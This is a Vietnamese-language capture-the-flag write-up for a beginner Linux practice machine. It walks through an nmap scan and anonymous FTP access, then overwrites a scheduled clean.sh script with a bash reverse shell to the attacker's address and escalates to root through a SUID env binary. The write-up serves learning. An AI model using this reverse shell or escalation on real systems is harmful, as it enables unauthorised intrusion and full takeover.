Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
--------------------------------------------------------------------
Bước 1: Thu thập thông tin
Mình sử dụng công cụ nmap để thu thập thông tin
nmap -A ip_victim
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 May 17 21:30 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.50.72
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2020-06-02T16:32:11+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-02T16:32:11
|_ start_date: N/A
Thu được thông tin cổng 21,22,139,145. Phát hiện dịch vụ ftp dùng user mặc định có thể khai thác thông tin từ dịch vụ này.
Bước 2: Khai thác thông tin thu được
Mình đăng nhập dịch vụ ftp thấy thư mục scripts
Mình truy cập thư mục này thấy có 3 tệp tincd scripts
Mình tiến hành tải 3 tệp tin này về kali để đọc get clean.sh
get removed_files.log
get to_do.txt
Mình đọc thấy rằng tệp shell clean.sh thực hiện và xuất dữ liệu ra tệp tin removed_file.log. Mình nghĩ dường như nó đang thực hiện một cách tự động.Mình thực hiện thử tạo lại tệp clean.sh với nội dung sau:
bash -i >& /dev/tcp/ip_kali_vpn/4444 0>&1
Mình thực hiện đăng nhập lại ftp với user anonymous xong đó thực hiện lệnh upload tệp tin clean.sh mới sửa lên:
put clean.sh
Đồng thời trên máy kali mình mở giao diện lắng nghe kết nối trả về và thành công
Bước 3: Leo thang
Mình thực hiện một số lệnh để đọc cờ đầu
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
ls -la
Đọc xong tệp user.txt mình thực hiện tìm lệnh leo thang
find / -user root -perm -u=s 2>/dev/null
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9066/bin/mount
/snap/core/9066/bin/ping
/snap/core/9066/bin/ping6
/snap/core/9066/bin/su
/snap/core/9066/bin/umount
/snap/core/9066/usr/bin/chfn
/snap/core/9066/usr/bin/chsh
/snap/core/9066/usr/bin/gpasswd
/snap/core/9066/usr/bin/newgrp
/snap/core/9066/usr/bin/passwd
/snap/core/9066/usr/bin/sudo
/snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9066/usr/lib/openssh/ssh-keysign
/snap/core/9066/usr/lib/snapd/snap-confine
/snap/core/9066/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/env <------- interesting!
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
Phát hiện tệp env có thể chạy leo thang
env /bin/sh -p
Thành công leo thang mình đọc cờ cuối thôi.
😃😃😃😃
![Advent of Cyber 2 [2020] - Tryhackme - Write Up - Day 1](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeXq7qj1vf7kjbSrUV-Q4iHtFE4W6cB1LFOWeuCvPqUIfsbJmzQk4xeZzqkKKz8t4mdohTiFeVTuXfpxKbZGp1OHj-KzpaOTJ7oB4ISB0lAR5ckzGMxY4rJyTYkBNySjgyYHyxXRiX9p0/w72-h72-p-k-no-nu/)
0 Comments